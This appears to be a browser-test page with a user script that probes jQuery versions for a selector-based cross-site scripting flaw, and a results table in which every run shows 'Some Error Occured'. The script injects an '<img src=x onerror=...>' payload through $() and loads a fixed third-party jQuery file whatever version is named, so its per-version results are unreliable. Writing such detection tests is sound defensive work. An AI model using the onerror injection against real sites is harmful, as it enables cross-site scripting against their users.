123

123

By
py31j2h 0 Seen 124 times
Tags
123

Results


Tested on
Chrome - 66 - Windows 10
jQuery Version | Is it Vulnerable?
2.0.3 | Some Error Occured
2.0.2 | Some Error Occured
2.0.1 | Some Error Occured
2.0.0 | Some Error Occured
1.10.2 | Some Error Occured
1.10.1 | Some Error Occured
1.10.0 | Some Error Occured
1.9.1 | Some Error Occured
1.9.0 | Some Error Occured
1.8.3 | Some Error Occured
1.8.2 | Some Error Occured
1.8.1 | Some Error Occured
1.8.0 | Some Error Occured
1.7.2 | Some Error Occured
1.7.1 | Some Error Occured
1.7.0 | Some Error Occured
1.6.4 | Some Error Occured
1.6.3 | Some Error Occured
1.6.2 | Some Error Occured
1.6.1 | Some Error Occured
1.6.0 | Some Error Occured
1.5.2 | Some Error Occured
1.5.1 | Some Error Occured
1.5.0 | Some Error Occured
1.4.4 | Some Error Occured
1.4.3 | Some Error Occured
1.4.2 | Some Error Occured
1.4.1 | Some Error Occured
1.4.0 | Some Error Occured
1.3.2 | Some Error Occured
1.3.1 | Some Error Occured
1.3.0 | Some Error Occured
1.2.6 | Some Error Occured
1.2.3 | Some Error Occured

Tested on
Chrome Mobile - 41 - Android
jQuery Version | Is it Vulnerable?
2.0.3 | Some Error Occured
2.0.2 | Some Error Occured
2.0.1 | Some Error Occured
2.0.0 | Some Error Occured
1.10.2 | Some Error Occured
1.10.1 | Some Error Occured
1.10.0 | Some Error Occured
1.9.1 | Some Error Occured
1.9.0 | Some Error Occured
1.8.3 | Some Error Occured
1.8.2 | Some Error Occured
1.8.1 | Some Error Occured
1.8.0 | Some Error Occured
1.7.2 | Some Error Occured
1.7.1 | Some Error Occured
1.7.0 | Some Error Occured
1.6.4 | Some Error Occured
1.6.3 | Some Error Occured
1.6.2 | Some Error Occured
1.6.1 | Some Error Occured
1.6.0 | Some Error Occured
1.5.2 | Some Error Occured
1.5.1 | Some Error Occured
1.5.0 | Some Error Occured
1.4.4 | Some Error Occured
1.4.3 | Some Error Occured
1.4.2 | Some Error Occured
1.4.1 | Some Error Occured
1.4.0 | Some Error Occured
1.3.2 | Some Error Occured
1.3.1 | Some Error Occured
1.3.0 | Some Error Occured
1.2.6 | Some Error Occured
1.2.3 | Some Error Occured

Tested on
Googlebot - 2.1 - undefined
jQuery Version | Is it Vulnerable?
2.0.3 | Some Error Occured
2.0.2 | Some Error Occured
2.0.1 | Some Error Occured
2.0.0 | Some Error Occured
1.10.2 | Some Error Occured
1.10.1 | Some Error Occured
1.10.0 | Some Error Occured
1.9.1 | Some Error Occured
1.9.0 | Some Error Occured
1.8.3 | Some Error Occured
1.8.2 | Some Error Occured
1.8.1 | Some Error Occured
1.8.0 | Some Error Occured
1.7.2 | Some Error Occured
1.7.1 | Some Error Occured
1.7.0 | Some Error Occured
1.6.4 | Some Error Occured
1.6.3 | Some Error Occured
1.6.2 | Some Error Occured
1.6.1 | Some Error Occured
1.6.0 | Some Error Occured
1.5.2 | Some Error Occured
1.5.1 | Some Error Occured
1.5.0 | Some Error Occured
1.4.4 | Some Error Occured
1.4.3 | Some Error Occured
1.4.2 | Some Error Occured
1.4.1 | Some Error Occured
1.4.0 | Some Error Occured
1.3.2 | Some Error Occured
1.3.1 | Some Error Occured
1.3.0 | Some Error Occured
1.2.6 | Some Error Occured
1.2.3 | Some Error Occured

User Script (ENUM_FUNCTION)

					
// Custom Functions
// Version label for the run in progress: written by test(), read by
// vulnerable() and safe() when they build the result title.
// NOTE(review): this is one shared slot. If the harness starts several test()
// runs before earlier ones have reported, a late result would be titled with
// whichever label was written last - confirm how the harness schedules runs.
var jQuery_version = '';
/**
 * Records a "vulnerable" outcome for the build named by `jQuery_version`.
 *
 * Called from the probe script inside the iframe as `parent.vulnerable()`,
 * i.e. only when the injected `<img>` error handler actually ran.
 * The message argument contains markup (`<b>`), so addError() presumably
 * renders it as HTML; the title embeds `jQuery_version` as-is - confirm how
 * the harness escapes it.
 */
function vulnerable(){
    var title = 'jQuery ' + jQuery_version;
    var verdict = '<b>Vulnerable</b>';
    addError(title, verdict);
}

/**
 * Records a "safe" outcome for the build named by `jQuery_version`.
 *
 * Called from the probe script inside the iframe as `parent.safe()`, which
 * happens only in that script's catch branch (the `$()` call threw).
 */
function safe(){
    var title = 'jQuery ' + jQuery_version;
    var verdict = 'Safe';
    addSuccess(title, verdict);
}
    
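/**
 * Removes the probe iframe (id `jQueryFrameID`) from the host page.
 *
 * Called from the probe script as `parent.removeIframe()` after either
 * outcome has been reported. Does nothing when no such frame is attached, so
 * a repeated call (for example an error handler firing more than once) does
 * not throw.
 *
 * NOTE(review): test() gives every frame the same id, and getElementById
 * returns the first match in document order, so with several frames present
 * this may remove a different run's frame.
 */
function removeIframe(){
    var frame = document.getElementById('jQueryFrameID');
    if (!frame || !frame.parentNode) {
        // Already removed, or never inserted: nothing to clean up.
        return;
    }
    frame.parentNode.removeChild(frame);
}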

// Test Function
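/**
 * Runs one probe: loads a jQuery file inside a throwaway iframe and checks
 * whether `$()` turns a string that does not begin with `<` into DOM nodes.
 *
 * The probe passes `. <img src=x onerror=bad();>` to `$()`. If the library
 * builds the `<img>`, its error handler calls bad(), which reports through
 * parent.vulnerable(). If `$()` throws, the catch branch reports through
 * parent.safe(). Both branches then call parent.removeIframe().
 * If the library file itself fails to load, the row is reported as
 * 'Some Error Occured' - that outcome says nothing about the library.
 *
 * @param {string} data - version label for this run; stored in the shared
 *   `jQuery_version` and used as the row title on load failure.
 */
function test(data){
    try{
        jQuery_version = data;
        var jQueryFrame = document.createElement('iframe');
        jQueryFrame.id = 'jQueryFrameID';
        jQueryFrame.onload = function(){
            var frameDoc = jQueryFrame.contentWindow.document;
            var jQueryScript = frameDoc.createElement('script');
            jQueryScript.type = 'text/javascript';
            // NOTE(review): this URL is fixed, plain HTTP and third-party, and
            // it ignores `data`: every enum value loads the same file, so a row
            // titled with a version does not describe that version. On an HTTPS
            // page a plain-HTTP script is blocked as mixed content, which would
            // surface as the onerror result below. If per-version results are
            // wanted, derive the URL from `data` and load it over HTTPS.
            jQueryScript.src = 'http://www.ah-l-tax.gov.cn/portal/templetlib/2016/images/jquery-1.4.2.js';
            // Handlers are attached before the element is inserted so neither
            // event can be missed.
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = frameDoc.createElement('script');
                exploit.type = 'text/javascript';
                // Script source is text, not markup, so set it as text.
                exploit.textContent = exploitScript;
                frameDoc.body.appendChild(exploit);
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
                // The probe never runs on this path, so nothing else would
                // remove the frame; drop it here by reference (not by id) so a
                // stale frame cannot be picked up by a later removeIframe().
                if (jQueryFrame.parentNode) {
                    jQueryFrame.parentNode.removeChild(jQueryFrame);
                }
            };
            frameDoc.body.appendChild(jQueryScript);
        };
        document.body.appendChild(jQueryFrame);
    }
    catch(err){
        // Only synchronous failures while creating or inserting the frame land
        // here; errors raised later inside the onload callbacks do not.
        addInfo(data ,  'Some Error Occured');
    }
}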
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Version labels handed to test(), one per run. The list follows the jQuery
// entry of the Google Hosted Libraries guide:
// https://developers.google.com/speed/libraries/devguide#jquery
// Order is newest first; one release series per line.
var data = [
    '2.0.3', '2.0.2', '2.0.1', '2.0.0',
    '1.10.2', '1.10.1', '1.10.0',
    '1.9.1', '1.9.0',
    '1.8.3', '1.8.2', '1.8.1', '1.8.0',
    '1.7.2', '1.7.1', '1.7.0',
    '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0',
    '1.5.2', '1.5.1', '1.5.0',
    '1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0',
    '1.3.2', '1.3.1', '1.3.0',
    '1.2.6', '1.2.3'
];